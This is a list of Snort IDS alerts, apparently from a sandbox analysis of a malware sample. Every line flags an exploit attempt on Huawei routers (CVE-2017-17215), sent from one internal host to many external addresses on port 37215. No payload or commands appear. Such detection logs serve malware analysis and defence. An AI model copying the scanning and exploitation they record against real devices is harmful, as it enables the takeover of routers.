              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58850 -> 41.119.93.57:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58850 -> 41.119.93.57:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56508 -> 197.35.253.5:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56508 -> 197.35.253.5:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58684 -> 197.252.226.228:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58684 -> 197.252.226.228:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33990 -> 41.196.189.226:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33990 -> 41.196.189.226:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36294 -> 41.12.156.197:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36294 -> 41.12.156.197:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38414 -> 156.167.122.41:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38414 -> 156.167.122.41:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39354 -> 41.113.11.68:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39354 -> 41.113.11.68:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51050 -> 41.41.95.201:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51050 -> 41.41.95.201:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44164 -> 41.26.2.2:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44164 -> 41.26.2.2:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47272 -> 41.201.89.180:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47272 -> 41.201.89.180:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56034 -> 41.66.186.65:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56034 -> 41.66.186.65:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42564 -> 197.27.200.127:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42564 -> 197.27.200.127:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56114 -> 156.237.170.76:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56114 -> 156.237.170.76:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58138 -> 156.59.177.15:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58138 -> 156.59.177.15:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46788 -> 197.91.250.61:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46788 -> 197.91.250.61:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54370 -> 156.201.14.29:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54370 -> 156.201.14.29:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48328 -> 41.15.193.245:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48328 -> 41.15.193.245:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41788 -> 197.234.232.228:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41788 -> 197.234.232.228:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36602 -> 197.230.194.3:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36602 -> 197.230.194.3:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58160 -> 197.119.156.133:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58160 -> 197.119.156.133:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45692 -> 156.27.221.22:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45692 -> 156.27.221.22:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49034 -> 197.216.238.129:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49034 -> 197.216.238.129:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60046 -> 41.174.115.39:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60046 -> 41.174.115.39:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47258 -> 41.170.34.101:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47258 -> 41.170.34.101:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41548 -> 197.33.14.33:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41548 -> 197.33.14.33:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56350 -> 156.211.89.221:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56350 -> 156.211.89.221:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60388 -> 197.149.113.57:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60388 -> 197.149.113.57:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44740 -> 41.38.164.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44740 -> 41.38.164.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36530 -> 156.231.3.185:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36530 -> 156.231.3.185:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34932 -> 197.9.107.34:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34932 -> 197.9.107.34:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60878 -> 41.140.184.247:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60878 -> 41.140.184.247:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60256 -> 41.204.133.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60256 -> 41.204.133.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45156 -> 197.37.79.4:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45156 -> 197.37.79.4:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35362 -> 41.117.93.142:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35362 -> 41.117.93.142:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35420 -> 197.64.121.194:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35420 -> 197.64.121.194:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41120 -> 41.186.239.153:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41120 -> 41.186.239.153:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60620 -> 41.144.136.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60620 -> 41.144.136.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44048 -> 197.255.246.136:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44048 -> 197.255.246.136:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52668 -> 156.197.209.223:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52668 -> 156.197.209.223:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57818 -> 156.159.10.140:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57818 -> 156.159.10.140:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53016 -> 156.32.124.85:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53016 -> 156.32.124.85:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57044 -> 156.218.214.250:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57044 -> 156.218.214.250:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37842 -> 41.209.100.187:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37842 -> 41.209.100.187:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51130 -> 41.109.81.128:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51130 -> 41.109.81.128:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58502 -> 197.156.129.89:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58502 -> 197.156.129.89:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37196 -> 41.89.132.28:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37196 -> 41.89.132.28:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52860 -> 156.29.235.89:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52860 -> 156.29.235.89:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49128 -> 156.165.201.247:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49128 -> 156.165.201.247:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33394 -> 156.168.136.24:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33394 -> 156.168.136.24:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53342 -> 197.218.247.171:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53342 -> 197.218.247.171:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39806 -> 197.99.205.156:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39806 -> 197.99.205.156:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58564 -> 156.245.2.205:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58564 -> 156.245.2.205:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60446 -> 197.226.229.29:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60446 -> 197.226.229.29:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38538 -> 41.179.145.152:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38538 -> 41.179.145.152:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42556 -> 41.195.163.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42556 -> 41.195.163.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59662 -> 197.50.100.135:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59662 -> 197.50.100.135:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37368 -> 156.90.232.117:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37368 -> 156.90.232.117:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42520 -> 156.225.196.18:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42520 -> 156.225.196.18:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37376 -> 156.15.16.186:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37376 -> 156.15.16.186:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54402 -> 41.63.241.27:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54402 -> 41.63.241.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34412 -> 156.156.74.74:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34412 -> 156.156.74.74:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33756 -> 197.244.78.206:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33756 -> 197.244.78.206:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53414 -> 156.38.108.66:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53414 -> 156.38.108.66:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53026 -> 197.57.68.100:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53026 -> 197.57.68.100:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45572 -> 197.67.118.32:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45572 -> 197.67.118.32:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53538 -> 41.236.7.25:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53538 -> 41.236.7.25:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39324 -> 156.211.48.76:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39324 -> 156.211.48.76:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36608 -> 41.223.243.35:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36608 -> 41.223.243.35:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:32966 -> 41.45.237.96:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:32966 -> 41.45.237.96:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54964 -> 41.58.54.58:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54964 -> 41.58.54.58:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43896 -> 41.186.220.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43896 -> 41.186.220.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50268 -> 197.128.25.119:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50268 -> 197.128.25.119:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49156 -> 156.245.237.250:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49156 -> 156.245.237.250:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52976 -> 197.57.169.86:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52976 -> 197.57.169.86:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56360 -> 41.241.121.248:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56360 -> 41.241.121.248:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38984 -> 156.122.137.98:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38984 -> 156.122.137.98:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40590 -> 41.194.61.76:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40590 -> 41.194.61.76:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60502 -> 156.176.31.94:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60502 -> 156.176.31.94:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41972 -> 156.163.189.151:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41972 -> 156.163.189.151:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44662 -> 41.253.102.61:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44662 -> 41.253.102.61:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35452 -> 197.116.197.156:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35452 -> 197.116.197.156:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57320 -> 156.12.201.188:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57320 -> 156.12.201.188:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41708 -> 156.19.135.49:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41708 -> 156.19.135.49:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56620 -> 156.24.110.61:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56620 -> 156.24.110.61:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51562 -> 41.130.180.46:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51562 -> 41.130.180.46:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48046 -> 197.167.77.113:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48046 -> 197.167.77.113:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38164 -> 156.162.243.21:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38164 -> 156.162.243.21:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56786 -> 197.59.140.99:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56786 -> 197.59.140.99:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52364 -> 197.238.227.229:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52364 -> 197.238.227.229:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49654 -> 197.98.178.183:37215
